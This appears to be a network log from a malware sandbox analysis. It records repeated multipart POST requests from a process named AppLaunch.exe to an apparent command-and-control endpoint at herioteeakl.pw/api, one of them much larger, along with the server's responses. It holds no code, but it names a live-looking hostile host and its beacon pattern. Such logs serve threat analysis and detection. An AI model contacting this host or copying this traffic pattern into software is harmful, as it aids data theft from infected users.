Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n5cAGjZQrw%2F6bO5OSlqvSLtpkIRy31DYv0%2FdVzzbuV%2BqTdar2iSiYbvj1pVLMv%2BATHisk4k8yutp96GUvLKoecEzl39zHyPYu1iJaociWS%2FM%2F31HYes8jTzZXIIqGPsOow%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b524ae866656b-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=d39cfjgh6977l4kg4vg27kcl57; expires=Fri, 08 Mar 2024 18:47:46 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:07 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=76P7%2BXsPQ4JmhMM8HMT4pTM1eH%2BDPdFg8W7DFCiKJZq9EPl%2FS0LuPRImKPZMPvoeZYNx%2F8dNvJ7SmhvxUXil3Wkhj5ld7%2BvDLp8KfZkh4jEgdTQOiSJvA63Yrq3l4KWLcA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b524be9bc1cb0-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=m0aqt0mlngp9567g6iqjll6e26; expires=Fri, 08 Mar 2024 18:47:47 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:08 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2JTzHKotQKwY43Nt%2FrE%2FJpt2BOn4siIwYQXQwFsAoqwAE31Yq1Zh7fsIUWgcJ1LF1tOnWI%2BkXYorMorWNy3rIVfXWnDOTQLzIWFYnmY9ppYhCiVaw2rtsFzLgtR4pfNhCA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b524cfa2266ce-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=jal0ve5e2tk5uhit5j1v86vpmi; expires=Fri, 08 Mar 2024 18:47:47 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:08 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fL1661LS2PhBsRGQoPVaUhkqmUb0A2vddiXbweHYpxX7lXqT3BC6ThyEvLHzhLdqzb59%2Fr6CTtZXdv5CwlSq7ht5vE7qfAE429DAWbL%2BUTimrfJthnuY%2FPDbg99UFFhpuA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b524e0a060b38-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=v7gd2qad2bafknsiajehbjtlh7; expires=Fri, 08 Mar 2024 18:47:47 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:08 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TDZykFW8vHXqxmK3S1QsyrQ1jNJ3p%2B%2FWAkbeSl9b3eZ9M8KXnAKk4nHcZImvnHYCThL8wfTPYFtMExzgJAqycSTArF361IrY9w5IN9Y7i2I%2BMXO1xccVmXjVUIX7eVOfCg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b524f1a156614-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=7brbo3ua9rma16q3f6b1sectab; expires=Fri, 08 Mar 2024 18:47:47 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:08 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XmUy30CrP%2FSNfKipogIHyY3bJe65cQuuGYZOsIq21spr8VUtvoCq%2BPSVxl1AzkYP8sr4NwRkBP6iw%2BN61sYrHf5tZuXLe5MSJf6v3JFl1H6AiOK2%2FnTAA97WiEcnDR8mQw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52509a976633-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=uj2mapsindv65kt1s68qfqh0d4; expires=Fri, 08 Mar 2024 18:47:47 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:08 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ja8FIi9uO6KoY4S8QMJlI47pnWUG5cQ5%2FZmTIxamX8OIdKe0ROoJHb34JK9DLmQtLFm9KmNVqAtxtW276VyC%2FAuw2xAV3OqvjIGJxUwdYnBtd4E7OroBVRXQSQmVnfQW8g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b5251ac0f66bc-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 17826
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ov7k2thhalv9cnmnet6i9ag0kv; expires=Fri, 08 Mar 2024 18:47:48 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:09 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N8srLFLUeELdgCJAeCM639F4GnQI%2BiOCV6UbKakIlN%2FOsqVF59OCMP51crOfZCuOk21VpKgLdoYCqoLJlehEF03Lj%2BkaujKKicvt0ZIMGtlEMv%2Fv8suCTxVGnCU3P%2Bl20Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52540b670a5f-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=lcglasstejb5ftl53fqbu706hn; expires=Fri, 08 Mar 2024 18:47:50 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:11 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ytKvVj0YzQITGcuQt%2FhylFLqeG1pJ41NSkL94%2B1PNBYrrcM1TrycfAbV98wr3OWOyY%2B6sPlQrlvbIXaHwkVTSNN8bK5eynp1%2FkJDcbuFd0l2Jizp%2Bwi5l0rtYXVbfqO21g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b5261f808b912-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=8erb9flcuvpil7d60ptglal3ii; expires=Fri, 08 Mar 2024 18:47:50 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:11 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hB603VJ3sQ7iAcRNgrJG9LH2ca6YK8PbYZXDS6TMrHBxXZkzmQTlMmWKQ%2FF0QicMz7MGQ%2FA2YFJumYnjjMCRwu9a0ivt8q4gIlmUtCeKSQxeQZy0FLK6vKR84P3920uZdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52632e70b948-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=3n2b5nccvg40tthamv4p01pmh1; expires=Fri, 08 Mar 2024 18:47:50 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:11 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yl4P%2FOLWWn%2Bm0VP3Iu%2FryGaElY15nUTe6%2FhqZSi9Wvgv6qU9VPhc1KxLIPAJUarB9kQV0ezyJaF1RiOpS5BJ7%2BSqVp7nQY7aq0i66YpnigLIQ97am6iNtri3%2BvcsZur2Kw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52646f0f0bc8-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=dhg9lhvia265vdi7raoonlql24; expires=Fri, 08 Mar 2024 18:47:50 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:11 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BBimBn4dbdUI4BLaALxZJf4qmvnIs85BdWANPJlLac7bVrkmBc%2F4UwnmqDMa6PPMhK6g9ivwLFw61AcHFR2KixZdH0qjTQB6y4ExS7W7hU3JBoEvnrBM%2FltONkQHaEKb0A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b526599e1b8c4-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=c8bprc7rfr2769pf74c9r61or7; expires=Fri, 08 Mar 2024 18:47:51 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:12 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kfdfJJhkEvH08uSEN8a%2B8DSxuRmwPkaZ13pIqJtlQetVKDomQDtZBiBuVrTeiv%2BUPgdbUrPTK2AM06g0Iwh99swNDFJV04LQdSXTtPW55%2FQIOoA7RDJJpgInpd%2F1Q9fsDA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b5266a8f90eb4-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=qtnfulvob8egptnmlqvot7hcr4; expires=Fri, 08 Mar 2024 18:47:51 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:12 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZOZecf0JkjCaU1V%2B%2FHLUf08iVOb5l%2B1yNh30ogrBHJMZri5rAxLKxvbMKfIlnbphnEPoHQEQneIm3tPchkndx3ayIqPAOtbnC8hnE26GUsJXur5CKCTsuoazdbq3BEjpVw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b526808b1b978-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=bn11gikidbrkpmovpg30jl0g94; expires=Fri, 08 Mar 2024 18:47:51 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:12 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qr9cM9FscZzvz48AVTn2Ow9xRFVpZ%2BDSghzGm3K5izOAikDwlw7rpbVKRSJQ7im5N3uousBqsKPd%2FEHrC6lvbJJC3vjHk686C9iQkrXSuin2yYJqHvaAIPMeRaMhHyOKDw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52691c7c66fa-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=62bo38a229qbfvt5lsb0d5ldje; expires=Fri, 08 Mar 2024 18:47:51 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:12 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y6K%2FOZbRaqIFgEZXNQlYgf7dDPEpnsEAaf%2B9YFdCUGfp2bcDXzLNsh9vQyiG8gAbKRt57Mqd%2BaJMC46UkGbtaPM9MDtBu07Zth78BiIKta88jQv%2Bl9FzWHOHN7tDTfavHA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b526a4e070b6a-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 1007
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=bgdmcn8jvggc8757g5fmmc81jm; expires=Fri, 08 Mar 2024 18:47:51 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:12 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z7kaOrO9KwA6quyO1P7P1oWrPmJ61GhSlUx%2BebB4yBHAE1BVrt4gBu4q1H7D9AUK46n%2FQ5GuBZfugBdc1fWQ6kJELHl7z%2FFL7v1A8qgvrddU%2B7HB6QXAB6PJRKomqHYKXA%3D%3D"}],"group":"cf-nel","max_age":604800}
